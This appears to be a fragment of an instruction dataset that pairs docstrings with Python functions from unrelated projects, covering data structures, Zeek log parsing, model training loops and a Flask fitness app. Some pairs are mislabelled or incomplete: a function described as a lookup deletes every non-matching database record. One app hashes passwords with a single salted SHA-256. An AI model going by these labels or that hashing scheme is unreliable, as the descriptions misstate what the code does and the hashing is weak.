dest=self._r_toml, + group=self._confd_owner[1], + owner=self._confd_owner[0])) + msg = 'Toml File Updated: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Toml File Updated: %s' % results + app.logger.info(logmsg(msg)) + r_tmpl_folder = os.path.join(self._r_tmpl, self._folder_pre) + state, state_sum, results = ansible_safe_run( + aapi=aapi, module='copy', + args=dict( + mode=self._confd_file_mode, + src=tmpl_folder, + dest=r_tmpl_folder, + group=self._confd_owner[1], + owner=self._confd_owner[0])) + msg = 'Tmpl File Updated: %s' % state_sum + app.logger.debug(logmsg(msg)) + msg = 'Tmpl File Updated: %s' % results + app.logger.info(logmsg(msg)) +[INST] Returns True if Empty and false otherwise. [/INST] def is_empty(self): + if self.top: + return False + return True +[INST] Returns the value at the top without modifying the stack, raises an exception otherwise. [/INST] def peek(self): + if not self.is_empty(): + return self.top.value + raise EmptyStackException("Cannot peek an empty stack") +[INST] Returns the value at the top without modifying the queue, raises an exception otherwise. 
[/INST] def peek(self): + if not self.stack.is_empty(): + current = self.stack.top + items = [] + while current: + items.insert(0,str(current.value)) + current = current.next + return items[0] + raise EmptyStackException("Cannot peek an empty stack") +[INST] this function takes a string value and return hashed key. [/INST] def hash(self,key): + sum = 0 + for letter in key: + sum= (sum + ord(letter)* key.index(letter) * 19)% self.size + return sum +[INST] this function take a string key and a value then add them in the hashtable as a list. [/INST] def add(self,key): + index = self.hash(key) + if self.buckets[index] is None: + self.buckets[index] = key + return None + return key +[INST] this method to append value in the last node +input ==> value. [/INST] def append(self, value): + if value is None: + raise TypeError("insert() missing 1 required positional argument: 'value' ") + else: + new_node = Node(value) + if not self.head: + self.head = new_node + else: + new_node = Node(value) + current = self.head + while current.next: + current = current.next + current.next = new_node +[INST] delete an item to the rear fo the queue. [/INST] def dequeue(self): + if not self.is_empty(): + temp = self.front + self.front = self.front.next + temp.next = None + return temp.value + raise EmptyQueueException("Cannot dequeue an empty queue") +[INST] Returns the value at the top without modifying the stack, raises an exception otherwise. [/INST] def peek(self): + if not self.is_empty(): + return self.front.value + raise EmptyQueueException("Cannot peek an empty queue") +[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: 'Model', + lineno: 'Optional[int]' = 0) -> int: +[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Iterable[Model]') -> str: +[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: 'Model', lineno: 'Optional[int]' = 0) -> str: +[INST] Serialise records to a log line.. [/INST] def dumps(self, data: 'Iterable[Model]') -> str: + return self.dump_file(data) +[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: Model, + lineno: 'Optional[int]' = 0) -> int: + try: + return file.write('%s\n' % json.dumps(data.tojson(), cls=self.encoder)) + except TypeError as error: + raise JSONWriterError(str(error), lineno=lineno) from error +[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Optional[Iterable[Model]]' = None) -> str: + if data is None: + return '' + return ''.join(self.dump_line(line, lineno=index) for index, line in enumerate(data, start=1)) +[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: 'Model', lineno: 'Optional[int]' = 0) -> str: + try: + return '%s\n' % json.dumps(data.tojson(), cls=self.encoder) + except TypeError as error: + raise JSONWriterError(str(error), lineno=lineno) from error +[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: 'Model', + lineno: 'Optional[int]' = 0) -> int: + try: + return file.write('%s\n' % self.str_separator.join(data.toascii().values())) + except TypeError as error: + raise ASCIIWriterError(str(error), lineno=lineno) from error +[INST] Write header fields of ASCII log file.. 
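For reference, the header the writer below emits follows the usual Zeek ASCII layout of '#'-prefixed directives. A tiny sketch that produces the same shape with hard-coded example values (the field names and Zeek types are made up):

import time

separator = '\t'
fields = ['ts', 'uid', 'id.orig_h']   # example field names
types = ['time', 'string', 'addr']    # example Zeek types

header = ''.join([
    '#separator \\x09\n',
    '#set_separator%s%s\n' % (separator, ','),
    '#empty_field%s%s\n' % (separator, '(empty)'),
    '#unset_field%s%s\n' % (separator, '-'),
    '#path%s%s\n' % (separator, 'conn'),
    '#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')),
    '#fields%s%s\n' % (separator, separator.join(fields)),
    '#types%s%s\n' % (separator, separator.join(types)),
])
print(header)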
[/INST] def write_head(self, file: 'TextFile', data: 'Optional[Model]' = None) -> int: + separator = self.str_separator + if data is None: + empty_field = self.str_empty_field + unset_field = self.str_unset_field + set_separator = self.str_set_separator + fields = '' + types = '' + else: + empty_field = data.empty_field.decode('ascii') + unset_field = data.unset_field.decode('ascii') + set_separator = data.set_separator.decode('ascii') + line_fields = data.fields + fields = separator.join(line_fields.keys()) + types = separator.join(field.zeek_type for field in line_fields.values()) + file.write('#separator %s\n' % unicode_escape(self.separator)) + file.write('#set_separator%s%s\n' % (separator, set_separator)) + file.write('#empty_field%s%s\n' % (separator, empty_field)) + file.write('#unset_field%s%s\n' % (separator, unset_field)) + file.write('#path%s%s\n' % (separator, os.path.splitext(file.name)[0])) + file.write('#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S'))) + file.write('#fields%s%s\n' % (separator, fields)) + return file.write('#types%s%s\n' % (separator, types)) +[INST] Write trailing fields of ASCII log file.. [/INST] def write_tail(self, file: 'TextFile') -> int: + return file.write('#close%s%s\n' % (self.str_separator, time.strftime(r'%Y-%m-%d-%H-%M-%S'))) +[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Optional[Iterable[Model]]' = None, name: 'Optional[str]' = None) -> str: + if data: + data_iter = iter(data) + line = next(data_iter) + buffer = self.dump_head(line, name=name) + buffer += self.dump_line(line, lineno=1) + buffer += ''.join(self.dump_line(line, lineno=index) + for index, line in enumerate(data_iter, start=2)) + else: + buffer = self.dump_head(name=name) + buffer += self.dump_tail() + return buffer +[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: Model, lineno: 'Optional[int]' = 0) -> str: + try: + return '%s\n' % self.str_separator.join(data.toascii().values()) + except TypeError as error: + raise ASCIIWriterError(str(error), lineno=lineno) from error +[INST] Serialise header fields of ASCII log file.. [/INST] def dump_head(self, data: 'Optional[Model]' = None, name: 'Optional[str]' = None) -> str: + if name is None: + name = '' + separator = self.str_separator + if data is None: + empty_field = self.str_empty_field + unset_field = self.str_unset_field + set_separator = self.str_set_separator + fields = '' + types = '' + else: + empty_field = data.empty_field.decode('ascii') + unset_field = data.unset_field.decode('ascii') + set_separator = data.set_separator.decode('ascii') + line_fields = data.fields + fields = separator.join(line_fields.keys()) + types = separator.join(field.zeek_type for field in line_fields.values()) + buffer = '#separator %s\n' % unicode_escape(self.separator) + buffer += '#set_separator%s%s\n' % (separator, set_separator) + buffer += '#empty_field%s%s\n' % (separator, empty_field) + buffer += '#unset_field%s%s\n' % (separator, unset_field) + buffer += '#path%s%s\n' % (separator, os.path.splitext(name)[0]) + buffer += '#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')) + buffer += '#fields%s%s\n' % (separator, fields) + buffer += '#types%s%s\n' % (separator, types) + return buffer +[INST] Serialise trailing fields of ASCII log file.. [/INST] def dump_tail(self) -> str: + return '#close%s%s\n' % (self.str_separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')) +[INST] Write Bro/Zeek log file.. 
[/INST] def write(data: 'Iterable[Model]', filename: 'PathLike[str]', format: str, *args: 'Any', **kwargs: 'Any') -> None: + if format == 'ascii': + return write_ascii(data, filename, *args, **kwargs) + if format == 'json': + return write_json(data, filename, *args, **kwargs) + raise WriterFormatError('unsupported format: %s' % format) +[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0, + model: 'Optional[Type[Model]]' = None) -> 'Model': +[INST] Parse log line as one-line record.. [/INST] def loads(self, line: bytes, lineno: 'Optional[int]' = 0) -> 'Model': + return self.parse_line(line, lineno) +[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0, + model: 'Optional[Type[Model]]' = None) -> 'Model': + try: + data = json.loads(line) + except json.JSONDecodeError as error: + raise JSONParserError(error.msg, lineno) from error + model_cls = model or self.model + if model_cls is None: + model_cls = new_model('', **{field: AnyType() for field in data.keys()}) + return model_cls(**data) +[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0, + model: 'Optional[Type[Model]]' = None, separator: 'Optional[bytes]' = b'\x09', + parser: 'Optional[List[Tuple[str, BaseType]]]' = None) -> 'Model': + if parser is None: + raise ASCIIPaserError("parse_line() missing 1 required positional argument: 'parser'") + data = collections.OrderedDict() + for i, s in enumerate(line.strip().split(separator)): + field_name, field_type = parser[i] + try: + data[field_name] = field_type(s) + except ZeekValueError as error: + raise ASCIIPaserError(str(error), lineno, field_name) from error + if model is None: + model = new_model('', **{field: AnyType() for field in data.keys()}) + return model(**data) +[INST] Parse Bro/Zeek log file.. [/INST] def parse(filename: 'PathLike[str]', *args: 'Any', **kwargs: 'Any') -> 'Union[JSONInfo, ASCIIInfo]': + with open(filename, 'rb') as file: + char = file.read(1) + if char == b'#': + return parse_ascii(filename, *args, **kwargs) + if char == b'{': + return parse_json(filename, *args, **kwargs) + raise ParserError('unknown format') +[INST] Not supported for a variadic data type.. [/INST] def parse(self, data: 'Any') -> 'NoReturn': + raise ZeekNotImplemented +[INST] Not supported for a variadic data type.. [/INST] def tojson(self, data: 'Any') -> 'NoReturn': + raise ZeekNotImplemented +[INST] Not supported for a variadic data type.. [/INST] def toascii(self, data: 'Any') -> 'NoReturn': + raise ZeekNotImplemented +[INST] Serialise data model as JSON log format.. [/INST] def tojson(self) -> 'OrderedDict[str, Any]': + fields = collections.OrderedDict() + for field, type_cls in self.__fields__.items(): + value = getattr(self, field) + fields[field] = type_cls.tojson(value) + return fields +[INST] Serialise data model as ASCII log format.. [/INST] def toascii(self) -> 'OrderedDict[str, str]': + fields = collections.OrderedDict() + for field, type_cls in self.__fields__.items(): + value = getattr(self, field) + fields[field] = type_cls.toascii(value) + return fields +[INST] Convert data model as a dictionary mapping field names to field values.. 
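A toy version of the conversion the next method performs, with an explicit field registry instead of the real model machinery (the class and field names here are made up):

import collections

class TinyModel:
    # Stand-in for the data model: declared field names live in __fields__.
    __fields__ = ('ts', 'uid')

    def __init__(self, ts, uid):
        self.ts, self.uid = ts, uid

    def asdict(self, dict_factory=collections.OrderedDict):
        # Map each declared field name to its current value.
        return dict_factory((f, getattr(self, f)) for f in self.__fields__)

print(TinyModel(1.0, 'C1').asdict())  # OrderedDict([('ts', 1.0), ('uid', 'C1')])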
[/INST] def asdict(self, dict_factory: 'Optional[Type[dict]]' = None) -> 'Dict[str, Any]': + if dict_factory is None: + dict_factory = dict + fields = dict_factory() + for field in self.__fields__: + value = getattr(self, field) + fields[field] = value + return fields +[INST] Convert data model as a tuple of field values.. [/INST] def astuple(self, tuple_factory: 'Optional[Type[tuple]]' = None) -> 'Tuple[Any, ...]': + field_names = [] + field_value = [] + for field in self.__fields__: + value = getattr(self, field) + field_names.append(field) + field_value.append(value) + if tuple_factory is None: + model_name = type(self).__name__ + named_tuple = collections.namedtuple(model_name, field_names) + return named_tuple(*field_value) + return tuple_factory(field_value) +[INST] Create a data model dynamically with the appropriate fields.. [/INST] def new_model(name: str, **fields: 'Any') -> 'Type[Model]': + def gen_body(ns: 'Dict[str, Any]') -> None: + for name, type_cls in fields.items(): + ns[name] = type_cls + return types.new_class(name, (Model,), exec_body=gen_body) +[INST] Return path to local copy of PDFBox jar file.. [/INST] def _get_pdfbox_path(self): + if 'PDFBOX' in os.environ: + pdfbox_path = pathlib.Path(os.environ['PDFBOX']) + if not pdfbox_path.exists(): + raise RuntimeError('pdfbox not found') + return pdfbox_path + a = appdirs.AppDirs('python-pdfbox') + cache_dir = pathlib.Path(a.user_cache_dir) + file_list = list(cache_dir.glob('pdfbox-app-*.jar')) + if file_list: + def f(s): + v = re.search('pdfbox-app-([\w\.\-]+)\.jar', s.name).group(1) + return pkg_resources.parse_version(v) + return sorted(file_list, key=f)[-1] + else: + pdfbox_url = self._get_latest_pdfbox_url() + sha512_url = pdfbox_url + '.sha512' + r = urllib.request.urlopen(pdfbox_url) + try: + data = r.read() + except: + raise RuntimeError('error retrieving %s' % pdfbox_url) + else: + cache_dir.mkdir(exist_ok=True, parents=True) + pdfbox_path = cache_dir.joinpath(pathlib.Path(pdfbox_url).name) + with open(pdfbox_path, 'wb') as f: + f.write(data) + r = urllib.request.urlopen(sha512_url) + encoding = r.headers.get_content_charset('utf-8') + try: + sha512 = r.read().decode(encoding).strip() + except: + raise RuntimeError('error retrieving sha512sum') + else: + if not self._verify_sha512(data, sha512): + raise RuntimeError('failed to verify sha512sum') + return pdfbox_path +[INST] Run validation with validation data split, computes mean average +precision and the loss of the prediction results.. 
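A side note on new_model above: types.new_class builds a class dynamically and lets a callback fill in its namespace. A minimal standalone illustration with a plain base class (all names hypothetical):

import types

class Base:
    pass

def make_model(name, **fields):
    # Create a Base subclass whose class attributes are the given fields.
    def fill_namespace(ns):
        ns.update(fields)
    return types.new_class(name, (Base,), exec_body=fill_namespace)

Conn = make_model('Conn', ts=float, uid=str)
print(issubclass(Conn, Base), Conn.ts, Conn.uid)  # True <class 'float'> <class 'str'>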
[/INST] def run_valid(self, epoch=0): + model = self.model + dataset = self.dataset + device = self.device + cfg = self.cfg + model.eval() + timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + log.info("DEVICE : {}".format(device)) + log_file_path = join(cfg.logs_dir, 'log_valid_' + timestamp + '.txt') + log.info("Logging in file : {}".format(log_file_path)) + log.addHandler(logging.FileHandler(log_file_path)) + batcher = ConcatBatcher(device, model.cfg.name) + valid_dataset = dataset.get_split('validation') + valid_split = TorchDataloader(dataset=valid_dataset, + preprocess=model.preprocess, + transform=model.transform, + shuffle=True, + steps_per_epoch=dataset.cfg.get( + 'steps_per_epoch_valid', None)) + valid_loader = DataLoader( + valid_split, + batch_size=cfg.val_batch_size, + num_workers=cfg.get('num_workers', 4), + pin_memory=cfg.get('pin_memory', False), + collate_fn=batcher.collate_fn, + worker_init_fn=lambda x: np.random.seed(x + np.uint32( + torch.utils.data.get_worker_info().seed))) + log.info("Started validation") + slots_save_dir = cfg.slots_save_dir + Path(f"{slots_save_dir}/").mkdir(parents=True, exist_ok=True) + self.valid_losses = {} + with torch.no_grad(): + for valid_idx, data in enumerate( + tqdm(valid_loader, desc='validation')): + data.to(device) + results = model(data) + for batch_idx, slots in enumerate(results[0]): + slots = slots.cpu().numpy() + num_slots = slots.shape[0] + for i in range(num_slots): + plt.subplot(num_slots, 1, i + 1) + plt.imshow(slots[i], cmap='binary') + plt.colorbar() + plt.title(f"Slot {i}") + plt.savefig( + f"{slots_save_dir}/epoch_{epoch}_slots_{valid_idx}_{batch_idx}.png") + plt.clf() + loss = model.loss(results, data) + for l, v in loss.items(): + if not l in self.valid_losses: + self.valid_losses[l] = [] + self.valid_losses[l].append(v.cpu().numpy()) +[INST] Run training with train data split.. 
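The heart of the training loop below is the usual optimize-one-batch pattern: forward pass, loss, zero_grad, backward, optional gradient clipping, optimizer step. A self-contained miniature with a toy linear model:

import torch
import torch.nn as nn

model = nn.Linear(4, 1)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
x, y = torch.randn(8, 4), torch.randn(8, 1)

model.train()
pred = model(x)
loss = nn.functional.mse_loss(pred, y)
optimizer.zero_grad()
loss.backward()
# Element-wise gradient clipping, mirroring the grad_clip_norm handling below.
torch.nn.utils.clip_grad_value_(model.parameters(), 1.0)
optimizer.step()
print(float(loss))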
[/INST] def run_train(self): + model = self.model + device = self.device + dataset = self.dataset + cfg = self.cfg + log.info("DEVICE : {}".format(device)) + timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + log_file_path = join(cfg.logs_dir, 'log_train_' + timestamp + '.txt') + log.info("Logging in file : {}".format(log_file_path)) + log.addHandler(logging.FileHandler(log_file_path)) + batcher = ConcatBatcher(device, model.cfg.name) + train_dataset = dataset.get_split('training') + train_split = TorchDataloader(dataset=train_dataset, + preprocess=model.preprocess, + transform=model.transform, + steps_per_epoch=dataset.cfg.get( + 'steps_per_epoch_train', None)) + train_loader = DataLoader( + train_split, + batch_size=cfg.batch_size, + num_workers=cfg.get('num_workers', 4), + pin_memory=cfg.get('pin_memory', False), + collate_fn=batcher.collate_fn, + worker_init_fn=lambda x: np.random.seed(x + np.uint32( + torch.utils.data.get_worker_info().seed)) + ) + self.optimizer, self.scheduler = model.get_optimizer(cfg.optimizer) + is_resume = model.cfg.get('is_resume', True) + start_ep = self.load_ckpt(model.cfg.ckpt_path, is_resume=is_resume) + dataset_name = dataset.name if dataset is not None else '' + tensorboard_dir = join( + self.cfg.train_sum_dir, + model.__class__.__name__ + '_' + dataset_name + '_torch') + runid = get_runid(tensorboard_dir) + self.tensorboard_dir = join(self.cfg.train_sum_dir, + runid + '_' + Path(tensorboard_dir).name) + writer = SummaryWriter(self.tensorboard_dir) + self.save_config(writer) + log.info("Writing summary in {}.".format(self.tensorboard_dir)) + log.info("Started training") + for epoch in range(start_ep, cfg.max_epoch + 1): + log.info(f'=== EPOCH {epoch:d}/{cfg.max_epoch:d} ===') + model.train() + self.losses = {} + process_bar = tqdm(train_loader, desc='training') + for data in process_bar: + data.to(device) + results = model(data) + loss = model.loss(results, data) + loss_sum = sum(loss.values()) + self.optimizer.zero_grad() + loss_sum.backward() + if model.cfg.get('grad_clip_norm', -1) > 0: + torch.nn.utils.clip_grad_value_(model.parameters(), + model.cfg.grad_clip_norm) + self.optimizer.step() + desc = "training - " + for l, v in loss.items(): + if not l in self.losses: + self.losses[l] = [] + self.losses[l].append(v.cpu().detach().numpy()) + desc += " %s: %.03f" % (l, v.cpu().detach().numpy()) + desc += " > loss: %.03f" % loss_sum.cpu().detach().numpy() + process_bar.set_description(desc) + process_bar.refresh() + if self.scheduler is not None: + self.scheduler.step() + if (epoch % cfg.get("validation_freq", 1)) == 0: + self.run_valid(epoch) + self.save_logs(writer, epoch) + if epoch % cfg.save_ckpt_freq == 0: + self.save_ckpt(epoch) +[INST] Save experiment configuration with tensorboard summary.. [/INST] def save_config(self, writer): + writer.add_text("Description/Open3D-ML", self.cfg_tb['readme'], 0) + writer.add_text("Description/Command line", self.cfg_tb['cmd_line'], 0) + writer.add_text('Configuration/Dataset', + code2md(self.cfg_tb['dataset'], language='json'), 0) + writer.add_text('Configuration/Model', + code2md(self.cfg_tb['model'], language='json'), 0) + writer.add_text('Configuration/Pipeline', + code2md(self.cfg_tb['pipeline'], language='json'), 0) +[INST] Reads lidar data from the path provided.. [/INST] def read_pc(path): + assert Path(path).exists() + return joblib.load(path) +[INST] takes uuid for record of type key and returns None if not found else the doc if found.. 
[/INST] def remove_all_admins_not_matching_this(u, user_type=None, collection=None): + __doc__ = None + if (collection): + try: + docs = collection.find() + for doc in docs: + uu = doc.get(user_type) if (user_type) else None + if (str(uu) == u): + __doc__ = doc + else: + d = {'_id':doc.get('_id')} + print('(-) Removed: {}'.format(d)) + collection.remove(d) + except: + pass + return __doc__ +[INST] Checks if email is used in database already.. [/INST] def validate_email(self, field): + if Runner.query.filter_by(email=field.data).count() > 0: + raise validators.ValidationError("Email in Use") + else: + print("Validate your account by going to http://127.0.0.1:5000/validate/" + self.username.data) +[INST] Checks if both password entered matches the one stored in the database, +and if the username entered exists.. [/INST] def validate_password(self, field): + if Runner.query.filter_by(username=self.username.data).count() == 0: + raise validators.ValidationError("Incorrect Username or Password") + salt = Runner.query.filter_by(username=self.username.data).first().salt + hashed_password = Runner.query.filter_by(username=self.username.data).first().hashed_password + if password.check_password(field.data, salt, hashed_password) is not True: + raise validators.ValidationError("Incorrect Username or Password") +[INST] Checks if the data the user entered is mathematically correct, and if the speed of their running is +an acceptable speed.. [/INST] def validate_speed(self, field): + if self.speed.data * self.hours_trained.data != self.distance.data: + raise validators.ValidationError("Check your maths, your numbers are wrong!") + if self.speed.data > 12: + raise validators.ValidationError("Are you sure your ran that fast?") +[INST] Checks if the data the user entered is mathematically correct, and if the speed of their cycling is +an acceptable speed.. [/INST] def validate_speed(self, field): + if self.speed.data * self.hours_trained.data != self.distance.data: + raise validators.ValidationError("Check your maths, your numbers are wrong!") + if self.speed.data > 25: + raise validators.ValidationError("Are you sure you cycled that fast?") +[INST] Returns the hashed password and a randomly generated salt.. [/INST] def hash_password(password): + password = password.encode("utf-8") + salt = base64.b64encode(os.urandom(32)) + hashed_password = hashlib.sha256(salt + password).hexdigest() + return hashed_password, salt +[INST] Hashes the password the user provides and checks it against the stored hash.. [/INST] def check_password(password, salt, hashed_password): + password = password.encode("utf-8") + return hashlib.sha256(salt + password).hexdigest() == hashed_password +[INST] Generates the percentage width of the progress bars on the Web App homepage.. 
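Looking back at hash_password and check_password above: the pattern is a random salt stored alongside a SHA-256 digest of salt+password, recomputed at login time. A compact standalone round trip of the same idea (function names here are illustrative):

import base64
import hashlib
import os

def make_hash(password: str):
    salt = base64.b64encode(os.urandom(32))
    digest = hashlib.sha256(salt + password.encode('utf-8')).hexdigest()
    return digest, salt

def verify(password: str, salt: bytes, digest: str) -> bool:
    return hashlib.sha256(salt + password.encode('utf-8')).hexdigest() == digest

digest, salt = make_hash('hunter2')
assert verify('hunter2', salt, digest)
assert not verify('wrong', salt, digest)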
[/INST] def homepage_progress(current_user): + def add_up_distance(training_type, username): + data = 0 + x = Training.query.filter_by(training_type=training_type, username=username).all() + for i in x: + data += i.distance + return data + def add_calories(username): + data = 0 + for i in Training.query.filter_by(username=username).all(): + data += i.calories_burnt + return data + def top_distance(training_type): + data = 0 + for user in Runner.query.order_by(Runner.username): + x = add_up_distance(training_type, user.username) + if x > data: + data = x + return data + def top_calories(): + data = 0 + for user in Runner.query.order_by(Runner.username): + x = add_calories(user.username) + if x > data: + data = x + return data + def calculate_percentage(top, user): + if user == 0: + return 10 + percent = (((user - top) / top) * 90) + if percent < 0: + percent *= -1 + if percent <= 10: + return 10 + else: + return percent + percentages = {"calories": calculate_percentage(top_calories(), add_calories(current_user.username)), + "running": calculate_percentage(top_distance("running"), add_up_distance("running", + current_user.username)), + "cycling": calculate_percentage(top_distance("cycling"), add_up_distance("cycling", + current_user.username)), + "swimming": calculate_percentage(top_distance("swimming"), add_up_distance("swimming", + current_user.username))} + return percentages +[INST] Custom function that checks if the user is an Admin. Based off of the standard Flask-Login @login_required.. [/INST] def admin_required(func): + @wraps(func) + def decorated_view(*args, **kwargs): + if current_user.admin is True: + return func(*args, **kwargs) + elif current_user.admin is None or current_user.admin is False: + return Response("You are not permitted to access this page!", 401) + return func(*args, **kwargs) + return decorated_view +[INST] Parses a relative path to tensorflow event file to a reasonable neptune-compatible name. [/INST] def parse_path_to_experiment_name(path): + experiment_name = os.path.dirname(path) + if experiment_name: + return experiment_name + else: + return "untitled-tensorboard" +[INST] Parses a relative path to tensorflow event file to a hostname. [/INST] def parse_path_to_hostname(path): + file_name = os.path.basename(path) + if file_name.startswith(_EVENTS_FILE_PREFIX): + timestamp_and_hostname = file_name[len(_EVENTS_FILE_PREFIX):] + separator_index = timestamp_and_hostname.find('.') + if separator_index >= 0: + return timestamp_and_hostname[(separator_index + 1):] + else: + return None + else: + return None +[INST] Import TensorFlow event files to Neptune\n +PATH is a directory where Neptune will look to find TensorFlow event files that it can import. +Neptune will recursively walk the directory structure rooted at logdir, looking for .*tfevents.* files.. [/INST] def sync(project, path): + import warnings + warnings.simplefilter(action='ignore', category=FutureWarning) + from neptune_tensorboard.sync.sync import sync as run_sync + return run_sync(project=project, path=path) +[INST] Use the Django builtin static file resolver to return an absolute path +usable as CSS url() argument. Sass equivalent of the 'static' template +tag.. [/INST] def static(path): + return django_static(path) +[INST] Perform sass.compile, but with the appropriate include_paths for Django added. 
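A note on the admin_required decorator above: it is the standard functools.wraps pattern of wrapping a view and short-circuiting on a permission check. Stripped of the Flask specifics (the role name and return values are illustrative):

from functools import wraps

def role_required(role):
    # Decorator factory: only call the wrapped function if the user has `role`.
    def decorator(func):
        @wraps(func)
        def wrapper(user, *args, **kwargs):
            if role not in getattr(user, 'roles', ()):
                return 'forbidden', 401
            return func(user, *args, **kwargs)
        return wrapper
    return decorator

@role_required('admin')
def dashboard(user):
    return 'ok', 200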
[/INST] def compile(**kwargs): + kwargs = kwargs.copy() + if PRECISION is not None: + kwargs['precision'] = PRECISION + kwargs['include_paths'] = (kwargs.get('include_paths') or []) + get_include_paths() + custom_functions = CUSTOM_FUNCTIONS.copy() + custom_functions.update(kwargs.get('custom_functions', {})) + kwargs['custom_functions'] = custom_functions + if SOURCEMAPS and kwargs.get('filename', None): + base_path = os.path.dirname(kwargs['filename']) + sourcemap_filename = os.path.join(base_path, 'sourcemap.map') + kwargs['source_map_filename'] = sourcemap_filename + libsass_output, sourcemap = sass.compile(**kwargs) + sourcemap = prefix_sourcemap(sourcemap, base_path) + output = embed_sourcemap(libsass_output, sourcemap) + else: + output = sass.compile(**kwargs) + return output +[INST] Wait for a key press on the console and return it.. [/INST] def wait_key(message = ''): + if message != '': + print (message) + result = None + if os.name == 'nt': + import msvcrt + result = msvcrt.getch() + else: + import termios + fd = sys.stdin.fileno() + oldterm = termios.tcgetattr(fd) + newattr = termios.tcgetattr(fd) + newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO + termios.tcsetattr(fd, termios.TCSANOW, newattr) + try: + result = sys.stdin.read(1) + except IOError: + pass + finally: + termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm) + return result +[INST] image must be numpy array H X W X channels. [/INST] def write_png(filename, image): + import zlib, struct + buf = image.flatten().tobytes() + width = image.shape[1] + height = image.shape[0] + width_byte_4 = width * 4 + raw_data = b''.join(b'\x00' + buf[span:span + width_byte_4] + for span in range((height - 1) * width_byte_4, -1, - width_byte_4)) + def png_pack(png_tag, data): + chunk_head = png_tag + data + return (struct.pack("!I", len(data)) + + chunk_head + + struct.pack("!I", 0xFFFFFFFF & zlib.crc32(chunk_head))) + png_bytes = b''.join([ + b'\x89PNG\r\n\x1a\n', + png_pack(b'IHDR', struct.pack("!2I5B", width, height, 8, 6, 0, 0, 0)), + png_pack(b'IDAT', zlib.compress(raw_data, 9)), + png_pack(b'IEND', b'')]) + AirSimClientBase.write_file(filename, png_bytes) +[INST] Data map generator for simulator(AirSim) data. Reads the driving_log csv file and returns a list of 'center camera image name - label(s)' tuples +Inputs: +folders: list of folders to collect data from. [/INST] def generateDataMapAirSim(folders): + all_mappings = {} + for folder in folders: + print('Reading data from {0}...'.format(folder)) + current_df = pd.read_csv(os.path.join(folder, 'airsim_rec.txt'), sep='\t') + for i in range(1, current_df.shape[0] - 1, 1): + previous_state = list(current_df.iloc[i-1][['Steering', 'Throttle', 'Brake', 'Speed (kmph)']]) + current_label = list((current_df.iloc[i][['Steering']] + current_df.iloc[i-1][['Steering']] + current_df.iloc[i+1][['Steering']]) / 3.0) + image_filepath = os.path.join(os.path.join(folder, 'images'), current_df.iloc[i]['ImageName']).replace('\\', '/') + if (image_filepath in all_mappings): + print('Error: attempting to add image {0} twice.'.format(image_filepath)) + all_mappings[image_filepath] = (current_label, previous_state) + mappings = [(key, all_mappings[key]) for key in all_mappings] + random.shuffle(mappings) + return mappings +[INST] Primary function for data pre-processing. Reads and saves all data as h5 files. +Inputs: +folders: a list of all data folders +output_directory: location for saving h5 files +train_eval_test_split: dataset split ratio. 
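The preprocessing entry point below hands the shuffled mappings to a ratio-based splitter. On its own, splitting a list into train/eval/test chunks by ratio looks roughly like this (the ratios are illustrative):

import random

def split_by_ratio(items, ratios=(0.7, 0.2, 0.1)):
    # Shuffle, then cut into consecutive chunks proportional to `ratios`.
    assert abs(sum(ratios) - 1.0) < 1e-9
    items = list(items)
    random.shuffle(items)
    splits, start = [], 0
    for r in ratios[:-1]:
        end = start + int(len(items) * r)
        splits.append(items[start:end])
        start = end
    splits.append(items[start:])  # remainder goes to the last chunk
    return splits

train, evaluation, test = split_by_ratio(range(100))
print(len(train), len(evaluation), len(test))  # 70 20 10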
[/INST] def cook(folders, output_directory, train_eval_test_split): + output_files = [os.path.join(output_directory, f) for f in ['train.h5', 'eval.h5', 'test.h5']] + if (any([os.path.isfile(f) for f in output_files])): + print("Preprocessed data already exists at: {0}. Skipping preprocessing.".format(output_directory)) + else: + all_data_mappings = generateDataMapAirSim(folders) + split_mappings = splitTrainValidationAndTestData(all_data_mappings, split_ratio=train_eval_test_split) + for i in range(0, len(split_mappings), 1): + print('Processing {0}...'.format(output_files[i])) + saveH5pyData(split_mappings[i], output_files[i]) + print('Finished saving {0}.'.format(output_files[i])) +[INST] creates a mask with class id values as pixel values +from the color ground truth mask image.. [/INST] def convert(fname: str) -> None: + img = cv2.imread(fname) + img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) + img_colors = np.unique(img.reshape(-1, img.shape[2]), axis=0) + label_id_fname = fname.replace("_gtFine_color", "_gtFine_labelIds") + color_mask = np.zeros(img.shape, dtype=np.uint8) + color_mask[np.where((img == [234, 30, 39]).all(axis=2))] = np.array([0]) + color_mask[np.where((img == [101, 190, 110]).all(axis=2))] = np.array([1]) + color_mask[np.where((img == [24, 92, 163]).all(axis=2))] = np.array([2]) + color_mask[np.where((img == [224, 212, 28]).all(axis=2))] = np.array([3]) + color_mask = color_mask[:, :, 0] + cv2.imwrite(label_id_fname, color_mask) +[INST] Take in a player input and assign their marker as 'X' +or 'O'. Think about using while loops to continually +ask until you get a correct answer.. [/INST] def player_input(): + player1 = input("\nPlayer 1 - Please pick a marker 'X' or 'O': ").upper() + val = validate(player1) + if val[0]: + player2 = val[1] + else: + return False + out = {'p1': [player1], 'p2': [player2]} + global chance + first = choose_first() 